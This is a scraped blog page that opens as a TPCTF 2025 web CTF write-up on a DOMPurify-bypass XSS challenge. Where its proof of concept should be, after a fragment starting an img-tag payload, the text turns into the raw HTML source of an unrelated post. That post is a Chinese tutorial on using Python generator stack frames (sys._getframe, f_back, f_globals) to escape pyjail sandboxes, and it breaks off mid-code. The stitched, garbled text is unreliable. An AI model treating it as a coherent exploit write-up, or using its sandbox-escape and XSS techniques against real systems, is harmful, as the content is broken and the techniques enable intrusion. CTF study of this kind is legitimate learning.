TPCTF 2025 Web Writeup

Posted Mar 20, 2025 Updated Mar 20, 2025

TPCTF 2025 Web Challenges

By DummyKitty

499 min read

TPCTF 2025 Web Writeup

Web

baby layout

Web: http://1.95.153.158:3000
Admin bot: http://1.95.153.158:1337

使用了 DOMPurify 来防护，使用的是最新的版本

参考：

https://mizu.re/post/exploring-the-dompurify-library-hunting-for-misconfigurations
https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes

Dom 在线解析：

https://yeswehack.github.io/Dom-Explorer/frame

DOMPurify 默认允许的 tag 和 attr

DOMPurify/src/tags.ts at 3.2.4 · cure53/DOMPurify

Poc

  
{"layout":"<img src=<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

